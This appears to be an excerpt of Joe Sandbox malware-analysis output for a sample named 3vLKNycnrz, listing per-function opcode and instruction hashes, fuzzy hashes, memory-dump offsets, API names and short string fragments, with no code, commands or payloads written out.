                                                        • Instruction ID: 79ae638c88d335b37b7fbcc31bff9f4ebf7454de2760e629d9247117e01224e7
                                                        • Opcode Fuzzy Hash: cfe836549f02e627f3b2c11d7aa07307bad81d50d039852b202a3dd3900c5905
                                                        • Instruction Fuzzy Hash: 8D11047BB299128FC310DE29DD8485AB7E3A7C9204F1A8538C9C8A7316DA70F90586C1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_3vLKNycnrz.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: [`^
                                                        • API String ID: 0-1988497175
                                                        • Opcode ID: ee180b808a7f4dec641293872c88d023af803cec24664664176417d5ab8da20f
                                                        • Instruction ID: e941a6215c83bcaa0aa8c79c5d33efb549c11c324bfc375e59b352c9aad200a8
                                                        • Opcode Fuzzy Hash: ee180b808a7f4dec641293872c88d023af803cec24664664176417d5ab8da20f
                                                        • Instruction Fuzzy Hash: 94B09238A48100878288CF05F991470A238A327204F0930288416E3271C520E8508A0C
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_3vLKNycnrz.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1bff0d3a1fba5e2fdb066276e7b3ec1bdbf4ba380aa7c3bf4b6c127a601a807d
                                                        • Instruction ID: cbc344237ec0f91119d97fc87e086ffb8153f3521390e37c44962f25c05f2320
                                                        • Opcode Fuzzy Hash: 1bff0d3a1fba5e2fdb066276e7b3ec1bdbf4ba380aa7c3bf4b6c127a601a807d
                                                        • Instruction Fuzzy Hash: 2112E43AA18611CFCB04CF28E89066AB3F2FB8E315F19847DD98A97352D7349945CB85
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_3vLKNycnrz.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f29069653d1576b781a6dad65962dbb8635d68ca22303e45bf67318e77b03a49
                                                        • Instruction ID: 2c477084993a33088d37bba3f059407362ccd068a9f5619b0dce89a35010763c
                                                        • Opcode Fuzzy Hash: f29069653d1576b781a6dad65962dbb8635d68ca22303e45bf67318e77b03a49
                                                        • Instruction Fuzzy Hash: 95E1052164C3E18BD7358F2984903ABFBD2AF97300F48496ED8D99B382D7398416C767
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_3vLKNycnrz.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: dea9208d1a23c046d84d2bb213fb1603c31a3af0dd8612dfb0bf0a8534fd0a12
                                                        • Instruction ID: 950baa307ef61fac1b8db86c963ccc7695260a2fe503ce085870ef768e3eb019
                                                        • Opcode Fuzzy Hash: dea9208d1a23c046d84d2bb213fb1603c31a3af0dd8612dfb0bf0a8534fd0a12
                                                        • Instruction Fuzzy Hash: 35A144B15083048BC7249F28D8926BBB3E1EFD6318F18492EE9D28B391F7789945C756
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_3vLKNycnrz.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 72f6e9b40e9f7719d3893cef25ecc5d4a19804311d22bf1d2d0af2f61b9ba396
                                                        • Instruction ID: a04235477dfd1905a4e4d199bb24443ee7e97cba45d900153b2cddd32c85e83a
                                                        • Opcode Fuzzy Hash: 72f6e9b40e9f7719d3893cef25ecc5d4a19804311d22bf1d2d0af2f61b9ba396
                                                        • Instruction Fuzzy Hash: 119113769083518BC325CF24C8913E7B3A1EF95310F1A8A6ED8C65B341E779AC86C785
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_3vLKNycnrz.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: e5daf988480bef6507c944e16cc69d0a76988bf7e68d426b1ec236d4bcf4a494
                                                        • Instruction ID: 1b58c5da0586d747452119d26138aba55f765d0aa29837898ddae360bc2baaf1
                                                        • Opcode Fuzzy Hash: e5daf988480bef6507c944e16cc69d0a76988bf7e68d426b1ec236d4bcf4a494
                                                        • Instruction Fuzzy Hash: 1B516C76B093104BD7149B24DC8073BF7A2DBDA714F29952EF5C55B382DE38AC02879A
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_3vLKNycnrz.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b020dff436126f13a45bc76c1d90e54a1ffaf932253cade2f2c65d24420f2d45
                                                        • Instruction ID: 2548437cb788fda130431fa846b8285ec5ffb5a1cbf8007a768b5723d1372b6f
                                                        • Opcode Fuzzy Hash: b020dff436126f13a45bc76c1d90e54a1ffaf932253cade2f2c65d24420f2d45
                                                        • Instruction Fuzzy Hash: E0513576A146408FDB28CF39CCA17777BE2AF96314B09C47DD486DB396DA38E8058718
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_3vLKNycnrz.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: beaa726a5c164c45a66496a8e4e65921f43a608172d3fe0f57dda7d7f91ae491
                                                        • Instruction ID: 8ba95efc9c89ef4b5b85eab29e0d9da9418972fd80a367163851d2d11555653c
                                                        • Opcode Fuzzy Hash: beaa726a5c164c45a66496a8e4e65921f43a608172d3fe0f57dda7d7f91ae491
                                                        • Instruction Fuzzy Hash: 40519B217083618BD7298E2894E16777782DF96320F9D826EDD924B7C6D22D8C0AD35F
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_3vLKNycnrz.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: ab07bd7374c9644cbdaab8c64895e8949f8c4aa7d4ff5c3097d6b13f0e5c95aa
                                                        • Instruction ID: 369512d6cd64a1d2e75d4d8eea207855d8f5bf0779b2a0c03d1f4b62fe1367ff
                                                        • Opcode Fuzzy Hash: ab07bd7374c9644cbdaab8c64895e8949f8c4aa7d4ff5c3097d6b13f0e5c95aa
                                                        • Instruction Fuzzy Hash: 3A41387AB406005BD615BB629C9263F7362EFD2718F18403EE586273C3DA7CAC06C65E
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_3vLKNycnrz.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: e1b313cfdca29bf762e69fe9ba82f988d5cd95722a07fd2e3347f515b1d9d594
                                                        • Instruction ID: 9afa4ba34189d19040924469891e76fb8a19db82670bd477210c0f96206c9e3a
                                                        • Opcode Fuzzy Hash: e1b313cfdca29bf762e69fe9ba82f988d5cd95722a07fd2e3347f515b1d9d594
                                                        • Instruction Fuzzy Hash: EB41073C3866008BC3298F65C8E147677A3EFAA714B68497ED6D647396C77CAC068B04
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_3vLKNycnrz.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c9db21ea2459aacfe3a3d3b1aa1a2a1c2eee496ed6365abe069c39768aa62438
                                                        • Instruction ID: 579d5b16ce76587613173f82801bceac228f5e4c9074940ca599c847a85a22e7
                                                        • Opcode Fuzzy Hash: c9db21ea2459aacfe3a3d3b1aa1a2a1c2eee496ed6365abe069c39768aa62438
                                                        • Instruction Fuzzy Hash: 2041F3B56083908FD320CF64A84072FB7E1FBC5719F550A3EE99497281DBB999018B87
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_3vLKNycnrz.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8f011ef72fb0e4d80f3df78356447a2e8c7ac61ee246e1c4ceb3eac49e17043b
                                                        • Instruction ID: 2c4be59617bd8084c6380483bf84402a8e148dc7db8bb65383c66ae7aec9e4f3
                                                        • Opcode Fuzzy Hash: 8f011ef72fb0e4d80f3df78356447a2e8c7ac61ee246e1c4ceb3eac49e17043b
                                                        • Instruction Fuzzy Hash: EA5107B0504B41AFD360CF39C849797BBE5AB4A320F144A2DE4AE87791D735A405CB96
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_3vLKNycnrz.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2187eb72e3f1fabe01e89da4775b33a08bdca3b004236166017210bfdd80ef90
                                                        • Instruction ID: 1a66bd1616f0fa654ce8f5075db046d6039c731cc7750fa1f0b8b03088e58b95
                                                        • Opcode Fuzzy Hash: 2187eb72e3f1fabe01e89da4775b33a08bdca3b004236166017210bfdd80ef90
                                                        • Instruction Fuzzy Hash: A3312A38B451009BD7298F94CCE15373793EB96318B28447EDA86573D6E73D9C0A8719
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_3vLKNycnrz.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 190d90955352593323db0f56454822f256c104e9dfa138d748ba594f875f77b0
                                                        • Instruction ID: c57d5ca269c73b3d3c66bbe4e0c938deb45da70e2ab25e960f0692798ea24c4c
                                                        • Opcode Fuzzy Hash: 190d90955352593323db0f56454822f256c104e9dfa138d748ba594f875f77b0
                                                        • Instruction Fuzzy Hash: F841F2B02083958FE7108F65A851B5FBBE4FB86B08F110A2DF695AB281C775D501CB5A
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_3vLKNycnrz.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: d561d4e577aff4640db6ca9fbe7bd82333474a9ca084f160fe617a8ed1355885
                                                        • Instruction ID: ec3ee4965a29eb483853914e20d359d8bcf43fe9425c406f081e20217d719906
                                                        • Opcode Fuzzy Hash: d561d4e577aff4640db6ca9fbe7bd82333474a9ca084f160fe617a8ed1355885
                                                        • Instruction Fuzzy Hash: BC3138386015019FD32A8B25CCA1A377BE2FF56319F68482DD582933E2D77C6C629B49
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_3vLKNycnrz.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e8f0c4b9b66733849db2b9eed23813e3a150c713e6f3eaeb56fab0d21798eb86
                                                        • Instruction ID: 79f7f4e77dd58a5f7dbbefa30f094a47f5f7a03851a7117380f377ae6b24f0aa
                                                        • Opcode Fuzzy Hash: e8f0c4b9b66733849db2b9eed23813e3a150c713e6f3eaeb56fab0d21798eb86
                                                        • Instruction Fuzzy Hash: 94312477A107424FC329CB39DC91596B7A3ABC2310319C27DD46693265EF75B426C688
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_3vLKNycnrz.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 4de3338a2442dd23b6bd7fb609e32885e1a11ea140783a8bb1cbdd605c20c9f2
                                                        • Instruction ID: 050fa42124f3f46daf63cd84828b6a551105945dc7ffe3fba68fcf268175474a
                                                        • Opcode Fuzzy Hash: 4de3338a2442dd23b6bd7fb609e32885e1a11ea140783a8bb1cbdd605c20c9f2
                                                        • Instruction Fuzzy Hash: 2B313838385200CBD7288B10CCE16363763EFA6308F64067ED686173D6C77C5C02871A
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_3vLKNycnrz.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 63fb9cee1c707cdd71164ab7743c8b2674dd602464fccd4c8551d01dce07b2dd
                                                        • Instruction ID: 7d8941836eb4d0cf5520391c3f6c38068f252d5ccd935eeb22236d54b4864dbe
                                                        • Opcode Fuzzy Hash: 63fb9cee1c707cdd71164ab7743c8b2674dd602464fccd4c8551d01dce07b2dd
                                                        • Instruction Fuzzy Hash: A91108367093005BD7209E55DCC063BB657EBDA728F39947EE68417305CF788C018299
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_3vLKNycnrz.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                        • Instruction ID: f0207f3c175e2f7eb559bac18a9e1e4a6c989109a7ad96abab0491fcbda2b84a
                                                        • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                        • Instruction Fuzzy Hash: 2D112933B041D40FC3268D3C8500566BFA31BA7234F19539AF4B5AB2D6D6668D8B9359
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_3vLKNycnrz.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 63add9a230e6399eef33deb58eff72e030b1abb6b7467dd7d6058bd84563484d
                                                        • Instruction ID: c2c3caa4eba607ec02c24ce6c21b5f2ee30797fa55a3adfe5fab05ac86fb0ebd
                                                        • Opcode Fuzzy Hash: 63add9a230e6399eef33deb58eff72e030b1abb6b7467dd7d6058bd84563484d
                                                        • Instruction Fuzzy Hash: FB0192B6B1231157D7209E11B4C172FB2A96F60708F58443ED50457381DF79FC098699
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_3vLKNycnrz.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 679be5f6d1f31ba29d0a74b45fcde3079020cd3336088093b56d30cd2d2498de
                                                        • Instruction ID: c20b345d2cbb7f8d38f0c13a4f6f8d7af336a0a686749e904e92d4a46460b2dd
                                                        • Opcode Fuzzy Hash: 679be5f6d1f31ba29d0a74b45fcde3079020cd3336088093b56d30cd2d2498de
                                                        • Instruction Fuzzy Hash: 5CD067E9D40001679206A712BC9397B61394A9364CB44103DF907A6362FB29B159555F
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_3vLKNycnrz.jbxd
                                                        Similarity
                                                        • API ID: AllocString
                                                        • String ID: $"$$$%$&$($*$*$,$.$0$0$1$2$4$6$8$:$<$=$>$?
                                                        • API String ID: 2525500382-2072951861
                                                        • Opcode ID: 0b754370f19d75ca4a4469516617a9b083c273429195c99349636bdfe6cac11f
                                                        • Instruction ID: 8e19ecaa8da9712f0609904da2e2b4264d0ae9bc6d115a7079b4a0c076594083
                                                        • Opcode Fuzzy Hash: 0b754370f19d75ca4a4469516617a9b083c273429195c99349636bdfe6cac11f
                                                        • Instruction Fuzzy Hash: 08A1382160C7D18AE336C63C984879FBED16BE7224F084BAED4E85B2D2D3B54506C767
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_3vLKNycnrz.jbxd
                                                        Similarity
                                                        • API ID: InitVariant
                                                        • String ID: !$#$%$'$($)$C$C$M$P$T$`$`$h$m$r$y${
                                                        • API String ID: 1927566239-2618090201
                                                        • Opcode ID: 6043887bfe4acdd9fd1d2654fe2dae0c881651a0d4f3ad7f97f6702383c55d6c
                                                        • Instruction ID: 1b14b0f98429bc29e25fd47c2420df7ddcda0f0887c26f4c91c9ad49ba9f3316
                                                        • Opcode Fuzzy Hash: 6043887bfe4acdd9fd1d2654fe2dae0c881651a0d4f3ad7f97f6702383c55d6c
                                                        • Instruction Fuzzy Hash: 6C41D37050D7C08EE316CB68D45839BBFD25BE6308F58499DE4C94B382CABA8449CB67
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_3vLKNycnrz.jbxd
                                                        Similarity
                                                        • API ID: Variant$ClearInit
                                                        • String ID: $"$$$&$($*$,$.
                                                        • API String ID: 2610073882-1741189123
                                                        • Opcode ID: 5ad79ab2634e9fe3df2e358658c890efc4b8a354b9aedca02a48e462d8abdbd3
                                                        • Instruction ID: c11783942caa2dee17585e0a966c12244b622c287fd7410d01b20c23b6c2d14f
                                                        • Opcode Fuzzy Hash: 5ad79ab2634e9fe3df2e358658c890efc4b8a354b9aedca02a48e462d8abdbd3
                                                        • Instruction Fuzzy Hash: C331E43050D7C18AD325DB38948864FBFE16B97214F888A9DE1E14B3D6C7B6840ACB97
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_3vLKNycnrz.jbxd
                                                        Similarity
                                                        • API ID: MetricsSystem
                                                        • String ID: Go|&
                                                        • API String ID: 4116985748-898334850
                                                        • Opcode ID: d8c3b9444f7f763b191bc3388f6c72bb1b1b862d7ca66563d04cfbdb886f9f9f
                                                        • Instruction ID: f3c36fca285df6ed61c4820b90c606d27138e20f590784f0eeb22096372c51e6
                                                        • Opcode Fuzzy Hash: d8c3b9444f7f763b191bc3388f6c72bb1b1b862d7ca66563d04cfbdb886f9f9f
                                                        • Instruction Fuzzy Hash: D3815AB00097C18AF370DF11D48979FBBE1FBC5749F618A1E80D86A641D7BA5588CF8A
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_3vLKNycnrz.jbxd
                                                        Similarity
                                                        • API ID: FreeLibrary
                                                        • String ID: Wu
                                                        • API String ID: 3664257935-4083010176
                                                        • Opcode ID: ca9ce37597e6a37cbad7b1fbb1ede4322e1c1ed79b09a7689ca17488a61cb0e0
                                                        • Instruction ID: 55532461e1dd4ca4955dc0e45aead4c654ac0ca17622991b842eff44720a9336
                                                        • Opcode Fuzzy Hash: ca9ce37597e6a37cbad7b1fbb1ede4322e1c1ed79b09a7689ca17488a61cb0e0
                                                        • Instruction Fuzzy Hash: 99C01238418000AFEF022F60FE098283E62AB46706B008030BC0080131CB22082EFF4E